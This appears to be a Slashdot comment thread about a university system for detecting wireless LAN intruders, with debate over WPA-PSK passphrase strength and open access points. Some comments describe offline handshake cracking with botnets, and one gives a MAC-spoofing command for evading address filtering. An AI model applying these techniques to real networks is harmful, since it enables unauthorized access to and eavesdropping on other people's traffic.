New Way to ID Invisible Intruders on Wireless LANs

Bergkamp10 writes "Australia's University of Technology in Queensland has created a groundbreaking new system that can detect invisible intruders on wireless LANs. Wireless networks have been almost impossible to thoroughly secure as they possess no clearly defined boundaries, instead they are defined by the quality and strength of the receiving antenna. QUT Information Security Institute researcher Dr Jason Smith has invented a new system to detect eavesdropping on unencrypted networks or active hijackings of computer sessions when a legitimate user who is logged onto the network leaves the connection. Smith has created a series of monitoring techniques that when used together can detect both attackers and configuration mistakes in network devices."

Virtually impossible?

[morgan_greywolf (835522)]

I don't know about that. I use WPA-PSK security on my WLAN, and I regularly monitor my network using ordinary means (logs, IDS, etc.) and I haven't seen any evidence of intruders, invisible or otherwise. I suppose this is one more thing I could add to my arsenal, but how many with security turned on really have trouble with this?

Re:Virtually impossible?

[cbiltcliffe (186293)]

and I regularly monitor my network using ordinary means (logs, IDS, etc.) and I haven't seen any evidence of intruders, invisible or otherwise. I suppose this is one more thing I could add to my arsenal, but how many with security turned on really have trouble with this?

If the intruders were invisible, how would you see them in logs and IDS? They're invisible. Passive monitoring won't show up in any logs. I know, because I do it sometimes as part of my security service to my customers. You can break into a WEP-encrypted moderate-traffic wireless network without sending a single packet. Once you're in, you can capture all traffic on that network and save it, again, without sending a single packet.
WPA can be cracked if someone uses a simple passphrase, and even random passphrases can be cracked without a whole lot of effort simply by renting part of a botnet, or running your own.

Using the Storm botnet as an example:

There were estimates that put the botnet as large as 50,000,000 computers. Having done WPA-PSK key cracking on a P4 1.6 laptop, it can run around 30 passphrases/second. My desktop is significantly faster, although I haven't actually tried PSK cracking on it. I'd assume probably 45 / second or more. It's not a state of the art machine, by any means. Probably about average.

So if we assume an 8 character random passphrase, (which is all a lot of people will use, so it's easier to remember) that you can type on your keyboard, (again, who's going to use Alt-Numpad combinations?) there are 96 possible keystroke characters that can make up each byte. 96^8 = 7213895789838336 possible password combinations.
Assuming 45 passphrases / second for each machine, it will take, using this botnet, just over 37 days to break that password. That's assuming the most complex password possible for 8 characters. Realistically, you can take out any special character that's not in 13375p3@k, and for most all you'd need is numbers and letters. That'll cut your time significantly.
Yes, that's only an 8 character password, which will take 96 times as long to break with only 1 extra character, but how many people, who don't use their full allotment of 63-characters of randomness, are going to use something like "password", "dave sucks", "fleabert" (name of their cat), or even "fleabert scratches too much" as their passphrase?
Now you've got standard words, which can easily be pulled from a dictionary and put together in different combinations until the passphrase is cracked. Trivial, with enough computing power. And unfortunately, the only people who have access to that kind of computing power, are (I shudder to use the word) cybercriminals.

Re:

[morgan_greywolf (835522)]

Of course, any security can be cracked... I personally use a shared key that is significantly longer than that. adding 1 extra character over 8 makes it 96^9, but adding, say 3 extra characters makes it 6382393305518410039296 possible password combinations, which would take that same botnet like 90,000 years to crack.

Oh, yeah, and bear in mind: those 50,000,000 would all have to be in range of the access point and would have to not overwhelm the access point. Even the best Cisco Aironet equipment isn't g

Re:

[VenTatsu (24306)]

You only need one computer in range of the WAP to capture the encrypted traffic. Then a bot net could be used to attempt to decrypt the traffic. While doing this is significantly harder that trying to associate directly it is also totally passive, and can be run in parallel.

Re:

[cbiltcliffe (186293)]

You need to look into cracking WPA-PSK. You don't need to know anything about the traffic. All you need are 4 packets, one if which is a hash of the passphrase. You hash your passphrase list until you find one that matches the hash captured from the AP, and then you've got your passphrase. No extra traffic necessary.

Re:

[by Anonymous Coward]

yea, but if you set up your wireless network with a specific set of MACs and only allow those macs to log in, keep all of your machines on so someone can't hijack the mac, and disable logins to your router from anything but one of those macs, they won't even be able to connect even after they crack your password unless they can flood your router or otherwise break it. Very few people can do this.

If you augment this with weekly password changes and the strongest possible password, they aren't getting in unle

Re:

[lubricated (49106)]

>>yea, but if you set up your wireless network with a specific set of MACs and only allow those macs to log in, keep all of your machines on so someone can't hijack the mac, and disable logins to your router from anything but one of those macs, they won't even be able to connect even after they crack your password unless they can flood your router or otherwise break it. Very few people can do this.

or you could just change your mac. This is very easy.
ifconfig eth1 hw ether newmacaddress

this also isn't

Re:

[Alpha830RulZ (939527)]

Thanks for laying that out. I don't know what makes this so hard for people to get/do. Come up with 3 to 5 words of something that means something to you, separate with some punctuation, and make sure it's around even only 20 characters, and it should take a million machine botnet something like 10^21 years to crack, assuming the 45/tries a second metric. eg., "IHave7FavoriteFl()wer&" should be good for something like the remaining life of the universe. (3.6*10^27 years, by my calculations)

Even so

Re:

[kickdown (824054)]

"WPA can be cracked if someone uses a simple passphrase, and even random passphrases can be cracked without a whole lot of effort simply by renting part of a botnet, or running your own."

You are assuming that WPA needs a human-configured passphrase here. Your calculations are all nice, but they refer to WPA-PSK (pre-shared key). If you use WPA with IEEE 802.1x (sometimes called WPA-"Enterprise"), a PMK (Pairwise Master Key) is generated by a AAA server *anew for every session*. I.e. as soon as someone logs

Doesn't seem to practical

[faloi (738831)]

The description is, basically, they use the signal strength and round trip times of the signals to figure out if someone unauthorized is on your network. The downside is that, in large corporate wireless networks, I would think people tend to be pretty mobile and there won't be a reliable indicator that the odd signal from slightly too far away isn't just somebody who remembered one last thing on the way to their car. Smaller wireless networks aren't likely to care enough to spend the time it takes to tell.

It's an interesting idea, but I have a hard time seeing it become widespread.

Re:

[cyriustek (851451)]

Whislt you have somewhat of a point, the odd occasion where one may forget something and try to access the LAN at his car is an outlier to the data set. If the system notices someone from that location connecting to the network, and can either force a new authentication event requiring a local cert, or can simply shut down the AP the external person is connecting to. (Preferably shutting it down.)

As an aside, the company can also have a policy explicitly forbidding access from the parking lot. If what they

Re:

[faloi (738831)]

That's actually a good point. I come at it from the point of view of the large companies I've worked for. To get on the corporate network via a wireless connection, you still have to authenticate to a VPN server. We have a separate wireless network that visitors from other companies can use, but it's got no connection to the corporate network. I'm sure it's not that way for every large company.

Damn

[FredDC (1048502)]

What? No, but this means that I[NO CARRIER]

"detect eavesdropping"

[by Anonymous Coward]

Yeah, right, detect eavesdropping. Any other snake oil you want to sell?

Re:

[Actually, I do RTFA (1058596)]

Yeah, right, detect eavesdropping. Any other snake oil you want to sell?

I have a pain-relief gel which has a side-effect of super-(strength/speed/control of sea animals).

Triangulation

[JustKidding (591117)]

So, basically, they are just triangulating every node on the network, and detecting when a node is outside a given range (outside the building?), or seems to suddenly jump to another location (session hijacking)? Would this still work if the attacker is using a directional, high-gain antenna to prevent effective triangulation? Also, varying the signal strength and round trip time could throw this off, but even if the exact location of the attacker cannot be determined because of it, the alarm could still be raised.

Re:

[Ungrounded Lightning (62228)]

So, basically, they are just triangulating every node on the network, and detecting when a node is outside a given range (outside the building?), or seems to suddenly jump to another location (session hijacking)? Would this still work if the attacker is using a directional, high-gain antenna to prevent effective triangulation?

Sounds like they're not "triangulating" - computing the DIRECTION to a station from two monitoring locations in order to identify the station's location as the third point of a triangl

Makes sense.

[ufoolme (1111815)]

Aussie's are really into all this wireless stuff!

I'm fairly new to all this but at a very basic level it seems to make sense.
It just a more complex method of looking at the flashing lights on the modem to see if its in sync with your known wireless connections. -- Okay alot more complex than that.

I wondeer if this can be applied to other wireless systems, e.g., radio systems. If so it would be very useful

eavesdropping

[backwardMechanic (959818)]

You can detect many things, but not eavesdropping. Your little wifi card broadcasts all kinds of data, in all directions. I can listen in and say nothing. How are you going to detect that? Warping of the ether?

Re:

[atdt1991 (1069776)]

Quantum Entanglement! We've got on-board chips for that ... right?

Re:

[mossmann (25539)]

TFA doesn't claim a method for detecting eavesdropping. Bad summary.

Re:

[backwardMechanic (959818)]

Fair enough. Like a good ./'er I haven't read it, of course ;-)

Re:eavesdropping

[Ungrounded Lightning (62228)]

You can detect many things, but not eavesdropping. Your little wifi card broadcasts all kinds of data, in all directions. I can listen in and say nothing. How are you going to detect that?

Your firmware might react to being associated with a network enough to eavesdrop it by also responding to low-level configuration traffic. If that happens, even if you don't send any data the firmware may respond to probes, letting the network know you're listening.

If you're truly eavesdropping you're undetectable. But do you know what the vendor put in the binary blob?

Nothing to see here, move along

[by Anonymous Coward]

"Depending on how sensitive the network is, armed security guards could be deployed [...]"

And they would shoot the guy with the laptop in the lobby? Whoops, wrong guy. It was the other guy in the lobby. Nope, it was the woman in the parking lot. Wait, no, it was an anomoly.

Sounds more like a weak attempt at a research project.

Re:

[Firethorn (177587)]

I work around some areas that would have this much sensitivity, it'd be more like 'there's somebody/somthing over there that's not authorized', they'd go check everyone, find the device and arrest.

Shooting would only come into effect if they resisted.

Of course, at those security levels they don't use wireless.

Re:

[marcello_dl (667940)]

Armed guard should first look for the guy who thinks a sensitive network can adopt wireless connections.

Australia's University of Technology ?

[mybecq (131456)]

Australia's University of Technology in Queensland

Otherwise known in reality as the Queensland University of Technology [qut.edu.au] in Australia.
Zonk or Bergkamp10, please do us all a favour and don't change the name of institutions.

How is this ground breaking?

[computerchimp (994187)]

1) hopping from one router to another is detected via traditional means
2) higher than average roundtrip times are noticed via traditional means
3) signal is triangulated via traditional means to put a location on a suspected signal.

A new but an obvious proceedure that someone has decided to put to paper and product. It is a nice product to notice but this is about as ground breaking as peanut butter and chocolate.

CC

FUD: tracking can be done w/accuracy

[postbigbang (761081)]

Newbury Networks, among others, have used triangulation coupled with latency to 'watch' 'intruders' on networks.

Businesses that don't put lock on their doors-- oops I mean a strong access key-- invite break-ins. It IS POSSIBLE to secure specific access points to the point where it's no longer useful to try and crack them; WPA2 with a random strong temporal, randomly-changed key (say 24hrs at most) will suffice. Instead, notebooks or stationary devices are more astute targets for the ne'er-do-wells.

All you kids...

[NickCatal (865805)]

Get off my WAN!

This is new? Products that do some/all now...

[myvirtualid (851756)]

Not to flame or troll or slashvertise, but how is this new? I was a conference recently where the coolest security product on display was from http://www.airtightnetworks.net/ [airtightnetworks.net]: Their WIPS can be configured with an organization's known wireless clients (MAC address, make, HW and SW versions, etc.), and then detect systems that shouldn't be there.

According to the reseller's CTO - I had the good fortune to stop by the booth before he and the COO departed and the booth was left with only salesdroids - the syst

Stating the bleeding obvious....

[sifi (170630)]

He said the valuable commodity at greatest risk on local area networks was information.

What, not like gold bullion or something?

Does not detect eavesdropping

[jvkjvk (102057)]

Now, I may not be a physicist, but I'll play one here on Slashdot.

I really don't see how this can detect eavesdropping. Of course, my definition of eavesdropping is that it is a passive activity, listening if you will, but not talking.

Since this technology appears to predicated on receiving a signal from the "eavesdropper" the real world equivalent would be the eavesdropper butting into your conversation to ask you a question or to tell you something.

Not that it isn't interesting or cool but perhaps the cl

Re:

[Silver Sloth (770927)]

But leave the router open, wouldya?

No, I won't.

I don't wan't anyone not authorised by me on my network. I see no reason why I 'ought to be required to provide this service to all listeners'. Sorry, my network, my rules.

Re:

[pipatron (966506)]

He didn't say your network. Just let people browse the big evil world wide web.

Re:

[kalirion (728907)]

Why the Hell would I want random strangers to reduce my bandwidth? If they want to browse the big evil world wide web, let them pay for their own high speed connection.

Re:

[jasen666 (88727)]

Because if they download kiddie pr0n, it's *MY* IP address that gets logged, and my house the FBI raids looking for said kiddie pr0n.
Not worth the risk to be a good Samaritan to the neighbor's who can't afford their own internet.

Re:

[cheater512 (783349)]

Your network which is being being beamed to my house.
If you want it secure, stop broadcasting it. Simple. :)

Re:

[X0563511 (793323)]

What I love is that (the summary at least) article states you can use this to see if someone is monitoring your network.

Excuse me? How in the hells would you tell of someone was passively reading incoming radio waves? Isn't that the point of active vs passive radar systems, for instance? You can't!

Re:

[Mister Whirly (964219)]

Sure, I'll unsecure my wireless network for you to use. As long as you leave your front door unlocked so I can come over to your house anytime I want, make a sandwich, watch some TV, play some video games, etc.
Entertainment is what we want. If you want to do entertaining things, you ought to be required to provide this service to all.

Re:

[pipatron (966506)]

Because it doesn't cost you anything extra, and if you do that, the moochers will let you browse for free when you're somewhere and need to check something.

Re:

[kalirion (728907)]

Doesn't cost you anything extra except bandwidth you mean. And money if they decide to bittorrent a few songs. And jail time if they decide to visit a few child porn sites.

Re:

[hedwards (940851)]

No, it isn't free. It might not cost any money directly, but I'd personally factor in the cost of the possibility of dealing with the police or FBI at some point into the cost.

Anybody posting here should know better than to leave a WAP open, the amount of trouble that can be caused by somebody abusing the set up is more than sufficient to justify keeping a sound security policy. Even then it may get broken, but that's where plausible deniability comes into it.

Re:

[xappax (876447)]

Even then it may get broken, but that's where plausible deniability comes into it.

You always have plausible deniability, even if you don't have a access point at all. It's completely possible and quite frequent that people's computers are 0wned by viruses and trojans, and used to route anonymous traffic, send spam, and mounts scans and attacks on other machines. If securing your systems was required to give plausible deniability, millions upon millions of computer users could be subject to criminal pro

Re:

[Mister Whirly (964219)]

"You always have plausible deniability"

Yeah, that worked splendidly in the Jammie Thomas case [wired.com].

"Nothing can protect you from having to deal with the police or the FBI."

Well, not completely, but I would say not allowing people to commit crimes on your network would do something to dissuade that a little bit. And this [arstechnica.com] headline couldn't more clearly refute your claim - "Child porn case shows that an open WiFi network is no defense". From TFA -
The merits of leaving your wireless access point (WAP) ope

Reading TFA.

[Eevee (535658)]

Well, the first thing you need to do is actually start reading the article you're using for support. From the fine article you quoted:

The FBI says it found CDs with child porn in Perez's room, the only one it searched.

Up to the time you can show how a wifi connection will make a physical CD magically show up in a room, then any argument about plausible deniability based off this case is full of it. You can't claim someone else was using your wireless connection to download child porn when you have a big st

Re:

[Mister Whirly (964219)]

software != hardware - Please cite some examples of your "open source hardware" that people are giving away for free.

Re:

[jasen666 (88727)]

Right, that keeps out amateurs and lazy hackers. Somebody that really, really wants in can still find a way eventually (except for WPA2... that hasn't been cracked yet has it?)

On mine, I've also taken the steps of disabling DHCP, and setting my network subnet mask to 248 as the last octet. This leaves only 6 IP's available, exactly the number of devices on my network. A hacker would not only have to clone a MAC address, but take one of my in-use IP addresses. Not an impossible task, but a pain in the as

Re:

[robbeh (926092)]

WEP is useless and can be cracked in less than 10 minutes using any laptop made in the last 10 years. Keep on using that WPA though.
MAC filtering is useless because anyone with Kismet can see the active MAC addresses on the network.
SSID hiding is useless because anyone with Kismet can see the active SSIDs around them.

Someone mentioned it earlier, but have a look at this:
http://blogs.zdnet.com/Ou/index.php?p=43 [zdnet.com]

Re:

[TechyImmigrant (175943)]

802.1X (It's a capital X) is not an authentication protocol. It's an architecture (1X) and a protocol protocol (EAPoL) to carry a protocol (EAP) that carries authentication protocols (EAP methods).

What you said is akin to recommending a purchaser of a computer use the box it came in.